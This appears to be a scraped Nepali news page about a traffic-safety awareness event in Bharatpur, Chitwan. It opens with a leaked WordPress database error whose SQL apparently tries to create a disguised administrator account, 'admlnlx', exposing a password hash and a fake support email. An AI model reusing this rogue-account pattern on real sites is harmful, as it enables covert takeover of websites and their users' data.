WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVMCqlzEG1pbIvTn4.3MY8dlRhXNCS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 07:05:47', '', 'admlnlx', 'admlnlx')
चितवन, माघ २४-
बढ्दो सवारी दुर्घटना न्युनिकरण गर्न सचेतना जगाउने उद्धेश्यले भरतपुर ४ बाह्रघरेमा ट्राफिक सचेतना कार्यक्रम सम्पन्न भएको छ ।जिल्ला ट्राफिक कार्यालय , वडा प्रहरी कार्यालय नारायणगढ, सामुदायिक सेवा केन्द्र नारायणगढ, बाह्रघरे टोल विकास संस्था, देउराली युवा समाजको आयोजनामा कार्यक्रम गरिएको हो ।
पछिल्लो समय ट्राफिक सचेतनामुलक कार्यक्रम शहर बजार क्षेत्रमा मात्र केन्द्रित हुंदा अन्य क्षेत्रमा सचेतनाको अभावमा दुर्घटनाको क्रम बढिरहेको भन्दै बाह«घरे चोकमा ट्राफिक सचेतना कार्यक्रम गरिएको हो । कार्यक्रममा बोल्दै जिल्ला ट्राफिक कार्यालय चितवनका प्रमुख प्रहरी निरीक्षक सन्तोष पन्तले सवारी दुर्घटना न्युनिकरणका लागि सचेतना कार्यक्रमले मात्र नहुने भन्दै यसका लागि चालक स्वयं सचेत र गम्भिर हुनुपर्नेमा जोड दिनुभयो । कार्यक्रममा ट्राफिक सम्बन्धि नियम , हेल्मेट सधैं प्रयोग गरौं , सवारी चलाउंदा मोबाईल फोनको प्रयोग नगरौं , मादक पदार्थ तथा लागुपदार्थ सेवन गरि मोटरसाईकल नचलाउं जस्ता सन्देशमुलक पर्चा वितरण गर्नुका साथै बाह«घरे चोकमा सन्देशमुलक होडिङ बोर्ड राखिएको छ ।
कार्यक्रममा वडा प्रहरी कार्यालय नारायणगढका प्रहरी निरीक्षक राजन थापा, सामुदायिक सेवा केन्द्र नारायणगढकी अध्यक्ष मिना खरेल बाह«घरे टोल विकास संस्थाका अध्यक्ष महेश कुमार पौडेल देउराली युवा समाजका अध्यक्ष अर्जुन अधिकारी लगायतले यस खालका कार्यक्रमले सवारी दुर्घटना हुने तर्फ चालक तथा अन्य व्यक्तिहरुलाई सचेत गराउन सहयोग पुराएको चर्चा गर्नुभयो ।